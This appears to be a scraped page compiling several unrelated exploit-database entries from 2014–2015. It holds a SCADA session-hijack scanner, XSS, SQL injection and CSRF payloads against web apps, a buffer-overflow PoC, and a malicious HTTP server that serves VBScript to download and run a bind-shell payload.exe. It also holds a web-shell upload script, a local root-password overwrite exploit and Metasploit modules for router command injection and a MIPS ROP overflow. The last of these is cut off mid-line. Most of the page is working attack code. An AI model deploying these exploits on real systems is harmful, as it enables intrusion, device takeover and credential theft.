HireHackking

=begin # Exploit Title: ESC 8832 Data Controller multiple vulnerabilities # Date: 2014-05-29 # Platform: SCADA / Web Application # Exploit Author: Balazs Makany # Vendor Homepage: www.envirosys.com # Version: ESC 8832 Data Controller Hardware # Tested on: ESC 8832 Data Controller Hardware # CVE : N/A (Yet) POC for session hijacking: From the attacker browser (unauthenticated), simply enter the following URL: http://IP_of_the_Device/escmenu.esp?sessionid=1&menuid=6 and increment the sessionid parameter, starting from 1 up until it makes sense. POC (and other vulns as well) was confirmed by the vendor Metasploit auxiliary module available at https://www.th3r3g3nt.com/public_files/esc_8832_session.rb Details [1] Insecure user session handling (Session Hijacking) Summary: This vulnerability allows an attacker to hijack a valid session that is in progress by a legitimate user. Details: Due to the predictable session generation and due to the lack of cookie based authentication in the web interface, it was confirmed that an attacker from a different source IP address can issue valid requests, impersonating the authenticated user. The attack complexity is very low, no special software is required. It was noted that valid sessions do time out after certain period of inactivity, however hijacked sessions can elongating the session validity. Impact: The attacker can bypass intended access restrictions and impersonate currently active users, including administrators. Successful exploitation will result in complete loss of control over the device, and may depend on the compromised user context. POC: From a browser, simply enter the following URL: http://IP_of_the_Device/escmenu.esp?sessionid=1&menuid=6 and modify the sessionid parameter, starting from 1 up until it makes sense. Typically 15 is high enough. [2] Insecure user session generation (Predictable user session generation) Summary: This vulnerability aids attackers to perform session hijacking Details: Upon successful authentication, the generated session ID are sequential in nature and starts at 1. For example if no user is authenticated, the first user who authenticates will receive the session ID 1. The next authenticated user will receive session ID 2 and so on. There is also seems to be a “read-only” / unknown behavior when user ID 0 is supplied. Negative, invalid and other fuzzable values were not tested. Impact: Successful exploitation will allow remote attackers to determine valid sessions, leading to session hijacking and can result in complete loss of control over the device. POC: N/A, confirmed by vendor [3] Insecure user authentication method (Unencrypted protocol) Summary: This vulnerability allows man-in-the-middle attackers to gain valid cleartext credentials Details: The device is only capable of HTTP based authentication, which doesn’t seem to offer encryption such as HTTPS. Note that the native end-point client shipped with the device was not tested. Impact: Man-in-the-middle attackers are able to sniff cleartext authentication credentials between the user and the device. Successful exploitation may result in partial or complete loss of control over the device, depending on the compromised user context. POC: N/A, see web interface open ports and protocols [4] Insecure user management (Lack of user names) Summary: This vulnerability significantly decreases the complexity requirements for bruteforce attacks Details: The web interface does not require a username to be entered in conjunction with the password; only the password drives the user role. Impact: Attackers can have significantly higher success rate for password bruteforcing. Successful exploitation may result in partial or complete loss of control over the device, depending on the compromised user context. POC: N/A, confirmed by vendor, inspect login screen [5] Insecure user session token transmission (Session token in HTTP GET) Summary: Session tokens are transmitted via HTTP GET request in unhashed form Details: Upon successful authentication, the session ID is being sent in the URL GET request. (http[nolink]:// 192.168.1.1/escmenu.esp?sessionid=1&menuid=6) Impact: Man-in-the-middle attackers and caching devices (proxies, routers with spanning ports, loggers, browser history, IDS/IPS etc.) can effectively capture valid session IDs. The session ID transmitted in the GET request is vulnerable to session hijacking. Successful exploitation may result in partial or complete loss of control over the device, depending on the compromised user context. POC: N/A, confirmed by vendor =end ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize(info={}) super(update_info(info, 'Name' => 'ESC 8832 Data Controller Session Hijack Scanner', 'Description' => %q{ This module detects if an active session is present and hijackable on the target ESC 8832 web interface.}, 'Author' => ['Balazs Makany'], 'References' => [ ['URL', 'https://www.th3r3g3nt.com/?p=28'], ], 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(80), OptBool.new('STOP_ON_SUCCESS', [true, "Stop when a live session was found", true]), ]) deregister_options('RHOST') end def run_host(target_host) result = [] begin ('1'.. '15').each do |u| print_status("Scanning #{target_host} - with Session ID '#{u}'") #Just to be on the safe side here. sleep(1) res = send_request_raw({ 'uri' => '/escmenu.esp?sessionid='+u+'&menuid=6', 'method' => 'GET', 'headers' => { 'Connection' => 'Close' } }, 25) if (res and res.code == 200 and res.body) if res.body.match(/(Configuration\sMenu)/im) print_good("#{target_host} - Active Session found as #{u}!") print_good("Complete request: http://#{target_host}/escmenu.esp?sessionid=#{u}&menuid=6") report_vuln( { :host => target_host, :port => datastore['RPORT'], :name => "ESC 8832 Web Vulnerability", :info => "Module #{self.fullname} confirmed a valid session (#{u}) on the ESC 8832 Web Interface", } ) break if datastore['STOP_ON_SUCCESS'] end if res.body.match(/(Access\sDenied!)/im) print_status(" Dead session") end end end rescue ::Interrupt raise $! rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_error("Timeout or no connection on #{rhost}:#{rport}") return rescue ::Exception => e print_error("#{rhost}:#{rport} Error: #{e.class} #{e} #{e.backtrace}") return end end end

source: https://www.securityfocus.com/bid/53497/info WP-FaceThumb is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. WP-FaceThumb 0.1 is vulnerable; other versions may also be affected. http://www.example.com/?page_id=1&pagination_wp_facethumb=1"><img/src=x onerror=alert(document.cookie)>

# Exploit Title: JSPMyAdmin 1.1 SQL Injection, CSRF & XSS # Google Dork: intitle:SQL Injection # Date: 2015-05-29 # Exploit Author: John Page (hyp3rlinx) # Website: hyp3rlinx.altervista.org/ # Vendor Homepage: https://code.google.com/p/jsp-myadmin/ # Software Link: https://code.google.com/p/jsp-myadmin/ # Version: 1.1 # Tested on: windows 7 # Category: webapps Source: http://hyp3rlinx.altervista.org/advisories/AS-JSPMYADMIN0529.txt Product: JSPAdmin 1.1 is a Java web based MySQL database management system. Advisory Information: ================================================ JSPMyAdmin 1.1 SQL Injection, CSRF & XSS Vulnerabilities SQL Injection CSRF XSS Vulnerability Details: ===================== SQL Injection: deletedata.jsp is supposed to delete 1 field per query, yet we can control the SQL and build an OR condition. Problem is application uses concatenated user input to build SQL statements even though paramaterized queries are used. In deletedata.jsp we find the following code: con.prepareStatement("DELETE FROM " + table + " WHERE "+ field + "='" + val +"'"); So expected SQL to be run is this deleting 1 record. e.g. http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID&val=7 But the SQL Injection vulnerability lets us instead drop all fields using an SQL 'OR' statement. e.g. http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID or 'field'='NAME' ************************************************************************************************* CSRF: We can drop any database by sending victim malicious linx as there is no CSRF token used. ***************************************************************************************** XSS: There is zero user input checks allowing remote attackers to execute arbitrary scripts in the context of an authenticated user's browser session. *************************************************** Exploit code(s): =============== SQL Injection POC: ------------------ So expected SQL to be run is this deleting 1 record http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID&val=7 http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID or 'field'='NAME' CSRF POC: --------- http://127.0.0.1:8081/JSPMyAdmin/drop.jsp?db=mydb XSS(s) POC: ---------- 1- </title><script>alert('XSS By hyp3rlinx');</script><title> Using POST method in 'host' parameter of login page. http://127.0.0.1:8081/JSPMyAdmin/ 2- http://127.0.0.1:8081/JSPMyAdmin/right.jsp?server=localhost&db= "/><script>alert(666)</script> 3- http://127.0.0.1:8081/JSPMyAdmin/right.jsp?server= "/><script>alert(666)</script>&db= 4- http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?db= "/><script>alert(666);</script> 5- http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?server=localhost&db=mysql&table= "/><script>alert(666);</script> 6- http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?server= "/><script>alert(666);</script>&db= 7- http://127.0.0.1:8081/JSPMyAdmin/query.jsp?server= "/><script>alert(666)</script>&db= 8- http://127.0.0.1:8081/JSPMyAdmin/export.jsp?db=test&table= <script>alert(666)</script> Disclosure Timeline: ========================================================= Vendor Notification: NA May 29, 2015: Public Disclosure Severity Level: ========================================================= High Description: ========================================================== Request Method(s): [+] GET / POST Vulnerable Product: [+] JSPMyAdmin 1.1 Vulnerable Parameter(s): [+] host, server, db, table Affected Area(s): [+] Entire admin =============================================================== (hyp3rlinx)

source: https://www.securityfocus.com/bid/53508/info Universal Reader is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Universal Reader 1.16.740.0 is vulnerable; other versions may also be affected. #!/usr/bin/perl -w $filename="a"x129; print "------Generate testfile \"a\"x129.epub------\n"; open(TESTFILE, ">$filename.epub"); sleep(3); close(TESTFILE); print "------Complete!------\n"; exit(1);

source: https://www.securityfocus.com/bid/53511/info The GRAND Flash Album Gallery plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. GRAND Flash Album Gallery 1.71 is vulnerable; other versions may also be affected. http://www.example.com/wp-admin/admin.php?page=flag-skins&skin=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

#!/usr/bin/python #Exploit Title:WebDrive Buffer OverFlow PoC #Author: metacom #Vendor Homepage: http://www.webdrive.com/products/webdrive/ #Software Link: https://www.webdrive.com/products/webdrive/download/ #Version: 12.2 (build # 4172) 32 bit #Date found: 31.05.2015 #Date published: 31.05.2015 #Platform: Windows 7 Ultimate #Bug: Multiple Buffer Overflow UNICODE ''' ---------------------------------------------------------------------------- Summary: Unlike a typical FTP client, WebDrive allows you to open and edit server-based, files without the additional step of downloading the file. Using a simple wizard, you assign a network drive letter to the FTP Server. WebDrive supports additional protocols such as WebDAV, SFTP and Amazon S3 and maps a drive letter to each of these servers.You can map unique drive letters to multiple servers.Download the full-function 20-day trial of WebDrive and make file management on remote servers easier and more efficient! ------------------------------------------------------------------------------ WebDrive connects to many types of web servers, as well as servers in the cloud.You can use WebDrive to access your files on all of the following server types and protocols: WebDAV ------------>Vulnerable WebDAV over SSL---->Vulnerable FTP---------------->Vulnerable FTP over SSL------->Vulnerable Amazon S3---------->Vulnerable SFTP--------------->Vulnerable FrontPage Server--->Vulnerable ------------------------------------------------------------------------------ How to Crash: Copy the AAAA...string from WebDrive.txt to clipboard, create a connection and paste it in the URL/Address and attempt to connect. WebDAV ============================ Crash Analysis using WinDBG: ============================ (430.9f8): Access violation - code c0000005 (!!! second chance !!!) eax=001cad5c ebx=02283af8 ecx=00000041 edx=02289d9c esi=fdf47264 edi=001cad5c eip=0055ff2b esp=001c8cfc ebp=001c8d00 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe webdrive+0x30ff2b: 0055ff2b 66890c16 mov word ptr [esi+edx],cx ds:0023:001d1000=???? 0:000> !exchain 001c8d20: webdrive+35a24e (005aa24e) 001cb768: webdrive+1c0041 (00410041) Invalid exception stack at 00410041 0:000> d 001cb768 001cb768 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 001cb778 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 001cb788 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 001cb798 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 001cb7a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 001cb7b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 001cb7c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 001cb7d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. WebDAV over SSL ============================ Crash Analysis using WinDBG: ============================ (b88.ca0): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=00000000 ecx=00410041 edx=775e660d esi=00000000 edi=00000000 eip=00410041 esp=000a1238 ebp=000a1258 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\ipworks9.dll - ipworks9!IPWorks_SNPP_Get+0x57f: 00410041 038d4df0e8da add ecx,dword ptr [ebp-25170FB3h] ss:0023:daf302a5=???????? 0:000>!exchain Invalid exception stack at 00410041 FTP and FTP over SSL ============================ Crash Analysis using WinDBG: ============================ (834.70c): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002d84f0 edi=00000000 eip=775e64f4 esp=002d8488 ebp=002d84dc iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 ntdll!KiFastSystemCallRet: 775e64f4 c3 ret 0:000> !exchain 002d8c1c: webdrive+35a24e (015da24e) 002db664: 00410041 Invalid exception stack at 00410041 Amazon S3 ============================ Crash Analysis using WinDBG: ============================ (a64.a98): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002f8550 edi=00000000 eip=775e64f4 esp=002f84e8 ebp=002f853c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 ntdll!KiFastSystemCallRet: 775e64f4 c3 ret 0:000> !exchain 002f8c7c: webdrive+35a24e (015da24e) 002fb6c4: 00410041 Invalid exception stack at 00410041 SFTP ============================ Crash Analysis using WinDBG: ============================ (848.9a8): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002380f8 edi=00000000 eip=775e64f4 esp=00238090 ebp=002380e4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 ntdll!KiFastSystemCallRet: 775e64f4 c3 ret 0:000> !exchain 00238824: webdrive+35a24e (015da24e) 0023b26c: 00410041 Invalid exception stack at 00410041 FrontPage Server ============================ Crash Analysis using WinDBG: ============================ (cd4.710): Access violation - code c0000005 (!!! second chance !!!) eax=007ba9f0 ebx=05d29738 ecx=00000041 edx=05d2fd48 esi=faa912b8 edi=007ba9f0 eip=003bff2b esp=007b8990 ebp=007b8994 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe webdrive+0x30ff2b: 003bff2b 66890c16 mov word ptr [esi+edx],cx ds:0023:007c1000=???? 0:000> !exchain 007b89b4: webdrive+35a24e (0040a24e) 007bb3fc: webdrive+360041 (00410041) Invalid exception stack at 00410041 ''' #Proof of Concept: buffer="http://" buffer+="\x41" * 70000 off=buffer try: out_file = open("WebDrive.txt",'w') out_file.write(off) out_file.close() print("[*] Malicious txt file created successfully") except: print "[!] Error creating file"

source: https://www.securityfocus.com/bid/53513/info Dynamic Widgets plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Dynamic Widgets 1.5.1 is vulnerable; other versions may also be affected. http://www.example.com/wp-admin/themes.php?page=dynwid-config&action=edit&id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

#!/usr/bin/python import BaseHTTPServer, socket ## # IBM Security AppScan Standard OLE Automation Array Remote Code Execution # # Author: Naser Farhadi # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 # # Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7 # # Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ # if you able to exploit IE then you can exploit appscan and acunetix ;) # This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And # Metasploit windows/shell_bind_tcp Executable Payload # # Usage: # chmod +x appscan.py # ./appscan.py # ... # nc 172.20.10.14 333 # # Video: http://youtu.be/hPs1zQaBLMU ## class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(req): req.send_response(200) if req.path == "/payload.exe": req.send_header('Content-type', 'application/exe') req.end_headers() exe = open("payload.exe", 'rb') req.wfile.write(exe.read()) exe.close() else: req.send_header('Content-type', 'text/html') req.end_headers() req.wfile.write("""Please scan me! <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe',\ 'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');" shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0 end function dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script>""") if __name__ == '__main__': sclass = BaseHTTPServer.HTTPServer server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler) print "Http server started", socket.gethostbyname(socket.gethostname()), 80 try: server.serve_forever() except KeyboardInterrupt: pass server.server_close()

################################################################################################### # Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability # Vendor : http://digitalzoomstudio.net/docs/wpzoomsounds/ # Author: bl4ck-dz # Date: 28/05/2015 # Infected File: upload.php # Category: webapps # Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/ # Tested on : Linux | Windows ################################################################################################### <?php $evil="dz.phtml"; $ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('file_field'=>"@$evil")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); echo "$postResult"; ?> Shell Access : http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload/$Evil # GreeTz : Akram Stelle ~ Mr DZ ~ All DzTeaM Members & all all Dz H4x0rs !

/* MyLittleUnix <= 3.0 VFS permissions root exploit ================================================ File permissions are not checked, we can abuse this to replace the root user password with our own and escalate our privileges. This exploit now 20% cooler and tested on latest 3.0 mlp OS. -- prdelka */ #include <stdio.h> #include <stdlib.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> char* pwnystr = "root:07821d2459368443042007bf1c7cdf3c55284" "29a65f8f10ce388d301b47865a283147bfd290545b" "0b9b12ae622a8eb359497cb3635506f99d2f5e4c4e" "594cadd:0:0:HackerFantastic:/home/root:/bi" "n/sh:fancy\n"; int main(){ int fd, r; struct stat *fileinfo = malloc(sizeof(struct stat)); char *buffer, *line, *filenm = "/etc/master.passwd"; printf("[+] MyLittleUnix <=3.0 VFS permissions local root exploit\n"); fd = open(filenm,O_RDWR); r = stat(filenm,fileinfo); buffer = malloc((uint)fileinfo->st_size); if(buffer){ read(fd,buffer,fileinfo->st_size); } else{ printf("[!] No pwn for you pwnie\n"); exit(0); } lseek(fd,0,SEEK_SET); line = strtok(buffer,"\n"); while(line){ if(strstr(line,"root:")){ write(fd,pwnystr,strlen(pwnystr)); } else{ write(fd,line,strlen(line)); write(fd,"\n",strlen("\n")); } line = strtok(NULL,"\n"); } close(fd); printf("[-] 20percent COOLER! user 'root' password is 'pwnies'\n"); exit(0); }

# Exploit Title: PonyOS <= 3.0 ELF loader privilege escalation # Google Dork: [if applicable] # Date: 29th May 2015 # Exploit Author: Hacker Fantastic # Vendor Homepage: www.ponyos.org # Software Link: [download link if available] # Version: 3.0 # Tested on: 3.0 # CVE : N/A Source: https://github.com/mdsecresearch/Publications/blob/master/exploits/rainbowdash.tgz?raw=true Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37168.tgz Blog post for more detail: http://blog.mdsec.co.uk/2015/05/my-lulzy-pwniez-abusing-kernel-elf.html

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include REXML def initialize(info = {}) super(update_info(info, 'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution', 'Description' => %q{ Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested successfully on a Trendnet TEW-731BR router with emulation. }, 'Author' => [ 'Ricky "HeadlessZeke" Lawshae', # Vulnerability discovery 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-8361'], ['ZDI', '15-155'], ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'], ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055'] ], 'DisclosureDate' => 'Apr 24 2015', 'Privileged' => true, 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'MIPS Little Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR') register_options( [ Opt::RPORT(52869) # port of UPnP SOAP webinterface ], self.class) end def check begin res = send_request_cgi({ 'uri' => '/picsdesc.xml' }) if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\/1.0 UPnP\/1.0/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavour => :echo, :linemax => 50, :nodelete => true ) end def execute_command(cmd, opts) uri = '/wanipcn.xml' soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping' data_cmd = '<?xml version="1.0"?>' + build_soap_req begin res = send_request_cgi({ 'uri' => uri, 'vars_get' => { 'service' => 'WANIPConn1' }, 'ctype' => 'text/xml', 'method' => 'POST', 'headers' => { 'SOAPAction' => soap_action }, 'data' => data_cmd.gsub(/CMD_HERE/, "`#{cmd.gsub(/\\/, '\\\\\\\\\\')}`") }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def build_soap_req new_external_port = rand(32767) + 32768 new_internal_port = rand(32767) + 32768 xml = Document.new xml.add_element( 'SOAP-ENV:Envelope', { 'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/', 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/' }) xml.root.add_element('SOAP-ENV:Body') body = xml.root.elements[1] body.add_element( 'm:AddPortMapping', { 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1' }) port_mapping = body.elements[1] port_mapping.add_element('NewLeaseDuration') port_mapping.add_element('NewInternalClient') port_mapping.add_element('NewEnabled') port_mapping.add_element('NewExternalPort') port_mapping.add_element('NewRemoteHost') port_mapping.add_element('NewProtocol') port_mapping.add_element('NewInternalPort') port_mapping.elements['NewLeaseDuration'].text = '' port_mapping.elements['NewInternalClient'].text = 'CMD_HERE' port_mapping.elements['NewEnabled'].text = '1' port_mapping.elements['NewExternalPort'].text = "#{new_external_port}" port_mapping.elements['NewRemoteHost'].text = '' port_mapping.elements['NewProtocol'].text = 'TCP' port_mapping.elements['NewInternalPort'].text = "#{new_internal_port}" xml.to_s end end

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Airties login-cgi Buffer Overflow', 'Description' => %q{ This module exploits a remote buffer overflow vulnerability on several Airties routers. The vulnerability exists in the handling of HTTP queries to the login cgi with long redirect parametres. The vulnerability doesn't require authentication. This module has been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation. Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT, Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable. }, 'Author' => [ 'Batuhan Burakcin <batuhan[at]bmicrosystems.com>', # discovered the vulnerability 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'Platform' => ['linux'], 'Arch' => ARCH_MIPSBE, 'References' => [ ['EDB', '36577'], ['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC ], 'Targets' => [ [ 'AirTies_Air5650v3TT_FW_1.0.2.0', { 'Offset' => 359, 'LibcBase' => 0x2aad1000, 'RestoreReg' => 0x0003FE20, # restore s-registers 'System' => 0x0003edff, # address of system-1 'CalcSystem' => 0x000111EC, # calculate the correct address of system 'CallSystem' => 0x00041C10, # call our system 'PrepareSystem' => 0x000215b8 # prepare $a0 for our system call } ] ], 'DisclosureDate' => 'Mar 31 2015', 'DefaultTarget' => 0)) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR') end def check begin res = send_request_cgi({ 'uri' => '/cgi-bin/login', 'method' => 'GET' }) if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavour => :echo, :linemax => 100 ) end def prepare_shellcode(cmd) shellcode = rand_text_alpha_upper(target['Offset']) # padding shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N") # restore registers with controlled values # 0003FE20 lw $ra, 0x48+var_4($sp) # 0003FE24 lw $s7, 0x48+var_8($sp) # 0003FE28 lw $s6, 0x48+var_C($sp) # 0003FE2C lw $s5, 0x48+var_10($sp) # 0003FE30 lw $s4, 0x48+var_14($sp) # 0003FE34 lw $s3, 0x48+var_18($sp) # 0003FE38 lw $s2, 0x48+var_1C($sp) # 0003FE3C lw $s1, 0x48+var_20($sp) # 0003FE40 lw $s0, 0x48+var_24($sp) # 0003FE44 jr $ra # 0003FE48 addiu $sp, 0x48 shellcode << rand_text_alpha_upper(36) # padding shellcode << [target['LibcBase'] + target['System']].pack('N') # s0 - system address-1 shellcode << rand_text_alpha_upper(16) # unused registers $s1 - $s4 shellcode << 